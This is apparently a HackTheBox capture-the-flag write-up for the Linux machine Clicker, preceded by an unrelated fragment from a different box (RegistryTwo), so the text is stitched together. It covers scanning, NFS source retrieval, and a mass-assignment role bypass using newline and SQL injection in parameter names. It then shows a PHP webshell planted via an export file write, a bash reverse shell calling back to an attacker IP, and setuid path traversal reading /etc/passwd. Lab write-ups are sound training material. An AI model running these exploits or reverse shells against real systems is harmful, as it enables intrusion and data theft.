iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT -i enp0s8
iptables -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT -i enp0s8
iptables -A INPUT -p tcp -m tcp --dport 5000 -j ACCEPT -i enp0s8
iptables -A INPUT -p tcp -m tcp --dport 5001 -j ACCEPT -i enp0s8
iptables -A INPUT -j DROP -i enp0s8
However, the IPv6 rules are not put in place. I’ll set the IP for registry.webhosting.htb
to the IPv6 of the host in my local hosts
file:
dead:beef::250:56ff:feb9:a1e9 registry.webhosting.htb
10.10.11.223 www.webhosting.htb webhosting.htb
Then on IPv6, I’m able to talk directly to a lot more ports:
oxdf@hacky$ nmap -6 -p- --min-rate 10000 registry.webhosting.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-30 04:06 EST
Warning: dead:beef::250:56ff:feb9:a1e9 giving up on port because retransmission cap hit (10).
Nmap scan report for registry.webhosting.htb (dead:beef::250:56ff:feb9:a1e9)
Host is up (0.11s latency).
Not shown: 61226 closed ports, 4299 filtered ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
3306/tcp open mysql
3310/tcp open dyna-access
5000/tcp open upnp
5001/tcp open commplex-link
8009/tcp open ajp13
8080/tcp open http-proxy
9002/tcp open dynamid
37549/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.69 seconds
When jkr and TheATeam got root blood on RegistryTwo, they actually noticed after having a foothold on the box before getting root, and used it to make development of the RMI client easier avoiding having to upload a JAR each time to get the program working. However, it is possible to shortcut the entire foothold using this if I can leak the IPv6 of the host.
There are nice methods for enumerating IPv6 addresses of other hosts on the same network that work in shared HTB labs. Ippsec has a great primer on this that I won’t recreate here. I will show how to do it via the Sessions Example file read.
I showed above how I could use the Sessions Example page to set the file that loads in the editor to whatever page I want. I’ll set it to /proc/net/if_inet6
:
On refreshing the editor, I get the file:
I can grab the one for eth0
and work with it there.
The website allows uses to create “domains” which it then handles as virtual hosts. I’ve already looked at the /sites
directory. Each “domain” has a folder, including www
:
root@registry:/sites# ls
www.static-482f6175cb85.webhosting.htb www.static-68d01707c93f.webhosting.htb www.static-e492442a4be9.webhosting.htb
www.static-5403e43655a0.webhosting.htb www.static-950ba61ab119.webhosting.htb www.static-e511acc71eed.webhosting.htb
www.static-5762637d572b.webhosting.htb www.static-c0a4a2cfd9ce.webhosting.htb www.static-f7200b8c1225.webhosting.htb
www.static-5a9d1f63c28c.webhosting.htb www.static-dd1305ddf270.webhosting.htb www.webhosting.htb
The nginx config is in /etc/nginx/sites-enabled/default
:
server {
listen 443 ssl;
listen [::]:443 ssl;
include snippets/self-signed.conf;
include snippets/ssl-params.conf;
if (!-d /sites/$http_host) {
rewrite . https://www.webhosting.htb/ redirect;
}
root /sites/$http_host;
server_name $http_host;
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
try_files $uri $uri/ =404;
}
location /hosting/ {
proxy_set_header X-Forwarded-Host $host;
proxy_set_header X-Forwarded-Server $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_pass http://127.0.0.1:8080/hosting/;
}
}
This is a neat nginx config. $http_host
is the value in the Host
HTTP header. If the (!-d /sites/$http_host)
checks if a folder exists for that host, and if not, it returns a redirect to www.webhosting.htb
. Then it sets the HTTP root to /sites/$http_host
. It’s quite simply, but still very clever.
For anything in the /hosting/
directory, it is forwarding it to 127.0.0.1:8080
, which is actually another docker container that runs the hosting-app
.
Clicker has a website that presents a game that is a silly version of Universal Paperclips. I’ll find an mass assignment vulnerability that allows me to change my role to admin after bypassing a filter two different ways (newline injection and SQLI). Then I’ll exploit a file write vulnerability to get a webshell and execution on the box. To escalate, I’ll find a SetUID binary for the next user and abuse it to read their SSH key. To get root, I’ll exploit a script the user can run with sudo, showing three different ways (playing with Perl environment variables, setting myself as the proxy and adding an XXE attack, and abusing LD_PRELOAD).
Name | Clicker Play on HackTheBox |
---|---|
Release Date | 23 Sep 2023 |
Retire Date | 27 Jan 2024 |
OS | Linux |
Base Points | Medium [30] |
Rated Difficulty | |
Radar Graph | |
00:55:29 | |
01:17:23 | |
Creator |
nmap
finds nine open TCP ports, SSH (22), HTTP (80), and seven related to NFS:
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.232
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 00:19 EST
Nmap scan report for 10.10.11.232
Host is up (0.11s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
36257/tcp open unknown
36645/tcp open unknown
39989/tcp open unknown
42059/tcp open unknown
54001/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 7.19 seconds
oxdf@hacky$ nmap -p 22,80,111,2049,36257,36645,39989,42059,54001 -sCV 10.10.11.232
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 00:26 EST
Nmap scan report for 10.10.11.232
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 36257/tcp mountd
| 100005 1,2,3 48115/tcp6 mountd
| 100005 1,2,3 55791/udp mountd
| 100005 1,2,3 55895/udp6 mountd
| 100021 1,3,4 33747/udp nlockmgr
| 100021 1,3,4 35015/tcp6 nlockmgr
| 100021 1,3,4 39989/tcp nlockmgr
| 100021 1,3,4 40338/udp6 nlockmgr
| 100024 1 41396/udp status
| 100024 1 42059/tcp status
| 100024 1 45838/udp6 status
| 100024 1 49747/tcp6 status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
36257/tcp open mountd 1-3 (RPC #100005)
36645/tcp open mountd 1-3 (RPC #100005)
39989/tcp open nlockmgr 1-4 (RPC #100021)
42059/tcp open status 1 (RPC #100024)
54001/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds
Segmentation fault (core dumped)
Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 22.04 jammy. The webserver returns a redirect to clicker.htb
. All the RPC ports seem to be related to NFS.
Given the use of the domain name clicker.htb
, I’ll use ffuf
to look for any subdomains that respond differently.
oxdf@hacky$ ffuf -u http://10.10.11.232 -H "Host: FUZZ.clicker.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac -mc all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.232
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.clicker.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
www [Status: 200, Size: 2984, Words: 686, Lines: 108, Duration: 3488ms]
#www [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 109ms]
#mail [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 110ms]
:: Progress: [19966/19966] :: Job [1/1] :: 365 req/sec :: Duration: [0:00:58] :: Errors: 0 ::
www
is worth checking out. The other two seem like errors. I’ll add these to my /etc/hosts
file:
10.10.11.232 clicker.htb www.clicker.htb
Some quick manual tests show that the two domains seem to return the same pages. As root later I can confirm this in /etc/apache2/sites-enabled/clicker.htb.conf
:
<VirtualHost *:80>
ServerName clicker.htb
ServerAlias www.clicker.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/clicker.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
The ServerAlias
directive sets www.clicker.htb
to be the same as clicker.htb
.
The website is for an old-school looking game called Clicker:
The Info link (/info.php
) just has some quotes from players. The Login link (/login.php
) has a login form, and the Register link (/register.php
) has a registration form:
Once I register and log in, there’s a game to play that’s just clicking to get “clicks”, and then spending clicks to level up and get more clicks per click:
It seems like a simple version of the Universal Paperclips game. The game is very easy to cheat in the browser dev tools:
It can lead to some wonky results:
The site is clearly built on PHP. All the clicking and scoring is done locally in JavaScript. Clicking “Save and close” will send the current numbers to the server actually as a GET request:
That redirects to /index.php?msg=Game has been saved!
.
Sending really large numbers crashes it:
I’ll run feroxbuster
against the site, and include -x php
since I know the site is PHP:
oxdf@hacky$ feroxbuster -u http://clicker.htb -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://clicker.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 107l 277w 2984c http://clicker.htb/
301 GET 9l 28w 311c http://clicker.htb/assets => http://clicker.htb/assets/
200 GET 127l 319w 3343c http://clicker.htb/info.php
302 GET 0l 0w 0c http://clicker.htb/export.php => http://clicker.htb/index.php
301 GET 9l 28w 315c http://clicker.htb/assets/css => http://clicker.htb/assets/css/
301 GET 9l 28w 314c http://clicker.htb/assets/js => http://clicker.htb/assets/js/
302 GET 0l 0w 0c http://clicker.htb/admin.php => http://clicker.htb/index.php
200 GET 114l 266w 3253c http://clicker.htb/register.php
302 GET 0l 0w 0c http://clicker.htb/logout.php => http://clicker.htb/index.php
200 GET 114l 266w 3221c http://clicker.htb/login.php
302 GET 0l 0w 0c http://clicker.htb/profile.php => http://clicker.htb/index.php
200 GET 107l 277w 2984c http://clicker.htb/index.php
302 GET 0l 0w 0c http://clicker.htb/play.php => http://clicker.htb/index.php
301 GET 9l 28w 312c http://clicker.htb/exports => http://clicker.htb/exports/
200 GET 0l 0w 0c http://clicker.htb/authenticate.php
401 GET 0l 0w 0c http://clicker.htb/diagnostic.php
[####################] - 4m 150000/150000 0s found:16 errors:1070
[####################] - 4m 30000/30000 124/s http://clicker.htb/
[####################] - 4m 30000/30000 123/s http://clicker.htb/assets/
[####################] - 4m 30000/30000 124/s http://clicker.htb/assets/css/
[####################] - 4m 30000/30000 124/s http://clicker.htb/assets/js/
[####################] - 3m 30000/30000 128/s http://clicker.htb/exports/
admin.php
is interesting, but even logged in it just redirects to the main page, likely requiring an admin account.
showmount -e
will enumerate the available NFS shares:
oxdf@hacky$ showmount -e clicker.htb
Export list for clicker.htb:
/mnt/backups *
There’s one share named backups
. I’ll mount it to my host:
oxdf@hacky$ sudo mount -t nfs clicker.htb:/mnt/backups /mnt
oxdf@hacky$ ls /mnt/
clicker.htb_backup.zip
The zip has the source code for the website:
oxdf@hacky$ unzip clicker.htb_backup.zip
Archive: clicker.htb_backup.zip
creating: clicker.htb/
inflating: clicker.htb/play.php
inflating: clicker.htb/profile.php
inflating: clicker.htb/authenticate.php
inflating: clicker.htb/create_player.php
inflating: clicker.htb/logout.php
creating: clicker.htb/assets/
inflating: clicker.htb/assets/background.png
inflating: clicker.htb/assets/cover.css
inflating: clicker.htb/assets/cursor.png
creating: clicker.htb/assets/js/
inflating: clicker.htb/assets/js/bootstrap.js.map
inflating: clicker.htb/assets/js/bootstrap.bundle.min.js.map
inflating: clicker.htb/assets/js/bootstrap.min.js.map
inflating: clicker.htb/assets/js/bootstrap.bundle.min.js
inflating: clicker.htb/assets/js/bootstrap.min.js
inflating: clicker.htb/assets/js/bootstrap.bundle.js
inflating: clicker.htb/assets/js/bootstrap.bundle.js.map
inflating: clicker.htb/assets/js/bootstrap.js
creating: clicker.htb/assets/css/
inflating: clicker.htb/assets/css/bootstrap-reboot.min.css
inflating: clicker.htb/assets/css/bootstrap-reboot.css
inflating: clicker.htb/assets/css/bootstrap-reboot.min.css.map
inflating: clicker.htb/assets/css/bootstrap.min.css.map
inflating: clicker.htb/assets/css/bootstrap.css.map
inflating: clicker.htb/assets/css/bootstrap-grid.css
inflating: clicker.htb/assets/css/bootstrap-grid.min.css.map
inflating: clicker.htb/assets/css/bootstrap-grid.min.css
inflating: clicker.htb/assets/css/bootstrap.min.css
inflating: clicker.htb/assets/css/bootstrap-grid.css.map
inflating: clicker.htb/assets/css/bootstrap.css
inflating: clicker.htb/assets/css/bootstrap-reboot.css.map
inflating: clicker.htb/login.php
inflating: clicker.htb/admin.php
inflating: clicker.htb/info.php
inflating: clicker.htb/diagnostic.php
inflating: clicker.htb/save_game.php
inflating: clicker.htb/register.php
inflating: clicker.htb/index.php
inflating: clicker.htb/db_utils.php
creating: clicker.htb/exports/
inflating: clicker.htb/export.php
I’ll give the highlights of the web source, going over what is needed for exploitation to gain a foothold. There’s also a file, diagnostic.php
, that doesn’t matter now but will play a role in the escalation to root.
I’ll open the directory of files in VSCode and let the Snyk plugin scan the code. It finds potentially XSS in a bunch of pages, hardcoded creds for the database, and the use of MD5:
The XSS alerts are all the way the site passes error messages through GET parameters. None of this seems promising to be useful for me.
The admin panel starts with a check that the user’s ROLE
is “Admin”:
<?php
session_start();
include_once("db_utils.php");
if ($_SESSION["ROLE"] != "Admin") {
header('Location: /index.php');
die;
}
?>
After that, there’s a mostly static page that calls get_top_players
and makes a table:
get_top_players
is defined in db_utils.php
.
There is an HTML form
that sends a POST request to export.php
with the threshold
and a selection of format as txt
, json
, and html
:
export.php
also does an admin role check at the start:
<?php
session_start();
include_once("db_utils.php");
if ($_SESSION["ROLE"] != "Admin") {
header('Location: /index.php');
die;
}
It builds output into a string as text, json, or HTML. HTML is the default rather than explicitly checking that the selection is html
:
$threshold = 1000000;
if (isset($_POST["threshold"]) && is_numeric($_POST["threshold"])) {
$threshold = $_POST["threshold"];
}
$data = get_top_players($threshold);
$currentplayer = get_current_player($_SESSION["PLAYER"]);
$s = "";
if ($_POST["extension"] == "txt") {
$s .= "Nickname: ". $currentplayer["nickname"] . " Clicks: " . $currentplayer["clicks"] . " Level: " . $currentplayer["level"] . "\n";
foreach ($data as $player) {
$s .= "Nickname: ". $player["nickname"] . " Clicks: " . $player["clicks"] . " Level: " . $player["level"] . "\n";
}
} elseif ($_POST["extension"] == "json") {
$s .= json_encode($currentplayer);
$s .= json_encode($data);
} else {
$s .= '<table>';
$s .= '<thead>';
$s .= ' <tr>';
$s .= ' <th scope="col">Nickname</th>';
$s .= ' <th scope="col">Clicks</th>';
$s .= ' <th scope="col">Level</th>';
$s .= ' </tr>';
$s .= '</thead>';
$s .= '<tbody>';
$s .= ' <tr>';
$s .= ' <th scope="row">' . $currentplayer["nickname"] . '</th>';
$s .= ' <td>' . $currentplayer["clicks"] . '</td>';
$s .= ' <td>' . $currentplayer["level"] . '</td>';
$s .= ' </tr>';
foreach ($data as $player) {
$s .= ' <tr>';
$s .= ' <th scope="row">' . $player["nickname"] . '</th>';
$s .= ' <td>' . $player["clicks"] . '</td>';
$s .= ' <td>' . $player["level"] . '</td>';
$s .= ' </tr>';
}
$s .= '</tbody>';
$s .= '</table>';
}
Then it writes the output to a file and returns the location:
$filename = "exports/top_players_" . random_string(8) . "." . $_POST["extension"];
file_put_contents($filename, $s);
header('Location: /admin.php?msg=Data has been saved in ' . $filename);
save_game.php
is one of the first times (besides registration and login) that the site interacts with the database. It checks that the user is logged in, and then checks that there is no GET parameter named role
(in any casing):
<?php
session_start();
include_once("db_utils.php");
if (isset($_SESSION['PLAYER']) && $_SESSION['PLAYER'] != "") {
$args = [];
foreach($_GET as $key=>$value) {
if (strtolower($key) === 'role') {
// prevent malicious users to modify role
header('Location: /index.php?err=Malicious activity detected!');
die;
}
$args[$key] = $value;
}
save_profile($_SESSION['PLAYER'], $_GET);
// update session info
$_SESSION['CLICKS'] = $_GET['clicks'];
$_SESSION['LEVEL'] = $_GET['level'];
header('Location: /index.php?msg=Game has been saved!');
}
?>
The comment shows that even the author is aware that this is a potential mass assignment vulnerability. The $_GET
is passed into save_profile
, which is also in db_utils.php
.
save_profile
uses the passed in GET parameters to build an SQL string, and updates the player:
function save_profile($player, $args) {
global $pdo;
$params = ["player"=>$player];
$setStr = "";
foreach ($args as $key => $value) {
$setStr .= $key . "=" . $pdo->quote($value) . ",";
}
$setStr = rtrim($setStr, ",");
$stmt = $pdo->prepare("UPDATE players SET $setStr WHERE username = :player");
$stmt -> execute($params);
}
The player is passed as a prepared statement, and the developer uses $pdo->quote()
to prevent SQL injection in the key values.
While the GET request to save_game.php
only sends two parameters, clicks
and level
, any that are passed to save_profile
will be saved. Looking at the create_new_player
function, there’s at least the following columns in the players
table:
$stmt = $pdo->prepare("INSERT INTO players(username, nickname, password, role, clicks, level) VALUES (:player,:player,:password,'User',0,0)");
This means I can easily change my username, nickname, or password via this mass assignment, by just adding &username=new0xdf
to the end of the URL. Messing with username risks breaking things, as I could end up with a non-unique username, which is used as a key at times in the site. Similarly, if I set the password to a non-hashed value, it would make that account impossible to log in to.
I’m not able to change my role in this same manner, as that will be caught at the top of save_game.php
and return a message “Malicious activity detected!”.
There are a couple of ways to bypass this filter. I’ll show two (yellow being the intended path):
flowchart TD;
A[Mass Assignment]-->B(#34;role#34; Filtered);
B-->C(Newline or comment\ninjection in parameter);
B-->D(SQL Injection in parameter);
C-->E[Admin role];
D-->E
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 1,3 stroke-width:2px,stroke:#4B9CD3,fill:none;
The easiest way to bypass this check is with a newline injection in the parameter name. SQL is very forgiving of whitespace (it’s often best practice to break long queries across lines). So if I make the parameter role%0a=Admin
, then it won’t return true when checked strtolower($key) === 'role'
. When it gets to save_profile
, it will generate the following SQL:
UPDATE players SET clicks='4',level='0',role
='Admin' WHERE username = "0xdf";
While the whitespace looks a bit odd, it works perfectly fine:
The $_SESSION['role']
is only set on login, but after logging out and back in:
There are other variations on this as well, such as role/**/
, which adds the start and close of an SQL comment.
The other way to bypass the role
check is using SQL injection. I noted that both the player name and values were protected against SQLI. However, the keys are not. The default parameters of clicks=4&level=0
result in the following SQL:
UPDATE players SET clicks='4',level='0' WHERE username = "0xdf";
If I change the clicks
parameter to role='Admin',clicks
(and URL encode that so that it makes it to PHP as one parameter name), then first it checks if lower(role='Admin',clicks)
is role
and it’s not, and then the SQL becomes:
UPDATE players SET role='Admin',clicks='4',level='0' WHERE username = "0xdf";
It bypasses the filter:
And results in admin access after logging out and back in.
As admin, I have access to the “Top Players” table, with an option to export in various formats, as observed in the source:
When I do the export, it reports the path:
And that link has it:
It’s interesting that the output adds the current player no matter if they meet the threshold or not.
The issue in the export.php
code is that it takes the user input for the format and uses that as the file extension without validating that it’s one of the three allowed formats. Further, because the if/elseif/else structure doesn’t check the html
case, it just uses HTML for anything that isn’t txt
or json
.
That means I can write a PHP file:
The table that’s output as HTML has only the nickname
, clicks
, and level
fields:
$s .= ' <tr>';
$s .= ' <th scope="row">' . $currentplayer["nickname"] . '</th>';
$s .= ' <td>' . $currentplayer["clicks"] . '</td>';
$s .= ' <td>' . $currentplayer["level"] . '</td>';
$s .= ' </tr>';
foreach ($data as $player) {
$s .= ' <tr>';
$s .= ' <th scope="row">' . $player["nickname"] . '</th>';
$s .= ' <td>' . $player["clicks"] . '</td>';
$s .= ' <td>' . $player["level"] . '</td>';
$s .= ' </tr>';
}
I’ve noticed that nickname
is set the same as username
on registration, but there’s nothing to prevent my updating it via the mass assignment:
Now if I export again:
Putting that all together, I’ll change my nickname
to be a PHP webshell:
I’ll do an export with extension=php
:
Now I’ll visit http://clicker.htb/exports/top_players_zhfppp54.php?cmd=id
and get execution:
To get a shell, I’ll start nc
listening on 443 and visit http://clicker.htb/exports/top_players_7pbbwdqy.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.14.6/443%200%3E%261%27
:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.232 44604
bash: cannot set terminal process group (1211): Inappropriate ioctl for device
bash: no job control in this shell
www-data@clicker:/var/www/clicker.htb/exports$
I’ll do the standard shell upgrade:
www-data@clicker:/var/www/clicker.htb/exports$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@clicker:/var/www/clicker.htb/exports$ ^Z
[1]+ Stopped nc -lnvp 443
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@clicker:/var/www/clicker.htb/exports$
There’s one other user with a home directory on the box:
www-data@clicker:/home$ ls
jack
www-data@clicker:/home$ ls jack/
ls: cannot open directory 'jack/': Permission denied
Unsurprisingly, www-data has no access.
I could look at the web stuff in www-data’s home directory, but it doesn’t prove useful here.
In /opt
there’s a directory and a shell script:
www-data@clicker:/opt$ ls -l
total 8
drwxr-xr-x 2 jack jack 4096 Jul 21 2023 manage
-rwxr-xr-x 1 root root 504 Jul 20 2023 monitor.sh
monitor.sh
starts with a check that it is running as root, so I’ll come back to that.
In manage
, there’s a README.txt
and an elf:
www-data@clicker:/opt/manage$ ls -l
total 20
-rw-rw-r-- 1 jack jack 256 Jul 21 2023 README.txt
-rwsrwsr-x 1 jack jack 16368 Feb 26 2023 execute_query
www-data@clicker:/opt/manage$ file execute_query
execute_query: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
The README.txt
has instructions for the binary:
www-data@clicker:/opt/manage$ cat README.txt
Web application Management
Use the binary to execute the following task:
- 1: Creates the database structure and adds user admin
- 2: Creates fake players (better not tell anyone)
- 3: Resets the admin password
- 4: Deletes all users except the admin
The binary does require arguments:
www-data@clicker:/opt/manage$ ./execute_query
ERROR: not enough arguments
Passing 1
shows the SQL that’s run:
www-data@clicker:/opt/manage$ ./execute_query 1
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
CREATE TABLE IF NOT EXISTS players(username varchar(255), nickname varchar(255), password varchar(255), role varchar(255), clicks bigint, level int, PRIMARY KEY (username))
--------------
--------------
INSERT INTO players (username, nickname, password, role, clicks, level)
VALUES ('admin', 'admin', 'ec9407f758dbed2ac510cac18f67056de100b1890f5bd8027ee496cc250e3f82', 'Admin', 999999999999999999, 999999999)
ON DUPLICATE KEY UPDATE username=username
--------------
It seems to be calling mysql
and inputting .sql
SQL dump files. Running strings
on the binary bolsters this theory:
www-data@clicker:/opt/manage$ strings execute_query | grep -F .sql
create.sql
populate.sql
reset_password.sql
clean.sql
I’ll base64 encode the binary, copy it back to my host, and decode it to get a copy:
oxdf@hacky$ vim execute_query.b64
oxdf@hacky$ base64 -d execute_query.b64 > execute_query
oxdf@hacky$ file execute_query
execute_query: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
oxdf@hacky$ md5sum execute_query
f09a05ad831b9a4c7cf8cce4d7ae4b81 execute_query
That matches what’s on Clicker:
www-data@clicker:/opt/manage$ md5sum execute_query
f09a05ad831b9a4c7cf8cce4d7ae4b81 execute_query
I’ll open the binary in Ghidra and take a look. The entire thing is in main
, which is:
undefined8 main(int argc,char **argv)
{
long lVar1;
int res;
undefined8 return_val;
char *filename_buffer;
size_t strlen_res;
size_t strlen_res2;
char *__dest;
long in_FS_OFFSET;
char queries_dir [20];
char local_78 [81];
lVar1 = *(long *)(in_FS_OFFSET + 0x28);
if (argc < 2) {
puts("ERROR: not enough arguments");
return_val = 1;
}
else {
res = atoi(argv[1]);
filename_buffer = (char *)calloc(0x14,1);
switch(res) {
case 0:
puts("ERROR: Invalid arguments");
return_val = 2;
goto LAB_001015e1;
case 1:
strncpy(filename_buffer,"create.sql",0x14);
break;
case 2:
strncpy(filename_buffer,"populate.sql",0x14);
break;
case 3:
strncpy(filename_buffer,"reset_password.sql",0x14);
break;
case 4:
strncpy(filename_buffer,"clean.sql",0x14);
break;
default:
strncpy(filename_buffer,argv[2],0x14);
}
queries_dir[0] = '/'; // /home/jack/queries/\0
queries_dir[1] = 'h';
queries_dir[2] = 'o';
...[snip]...
queries_dir[17] = 's';
queries_dir[18] = '/';
queries_dir[19] = '\0';
strlen_res = strlen(queries_dir);
strlen_res2 = strlen(filename_buffer);
__dest = (char *)calloc(strlen_res2 + strlen_res + 1,1);
strcat(__dest,queries_dir);
strcat(__dest,filename_buffer);
setreuid(1000,1000);
res = access(__dest,4);
if (res == 0) {
cmd_str[0] = '/'; // cmd_str = /usr/bin/mysql -u clicker_db_user
cmd_str[1] = 'u'; // --password='clicker_db_password'
cmd_str[2] = 's'; // clicker -v < \0
cmd_str[3] = 'r';
...[snip]...
cmd_str[78] = '<';
cmd_str[79] = ' ';
cmd_str[80] = '\0';
strlen_res = strlen(local_78);
strlen_res2 = strlen(filename_buffer);
filename_buffer = (char *)calloc(strlen_res2 + strlen_res + 1,1);
strcat(filename_buffer,local_78);
strcat(filename_buffer,__dest);
system(filename_buffer);
}
else {
puts("File not readable or not found");
}
return_val = 0;
}
LAB_001015e1:
if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
return return_val;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
It gets a filename, appends it to the mysql
command so that it’s pass as input, and runs it with -v
which shows the file.
I’ll also note that while case 0 is a failure, the default case runs with argv[2]
as the filename.
I’ll try to read a file using execute_query
with type 223 (or any other input that matches the default case) and directory traversal to get the file I want. It’s not able to read user.txt
:
www-data@clicker:/opt/manage$ ./execute_query 223 ../user.txt
File not readable or not found
But /etc/passwd
works:
www-data@clicker:/opt/manage$ ./execute_query 223 ../../../etc/passwd
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
jack:x:1000:1000:jack:/home/jack:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:115:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:116:65534::/var/lib/nfs:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
--------------
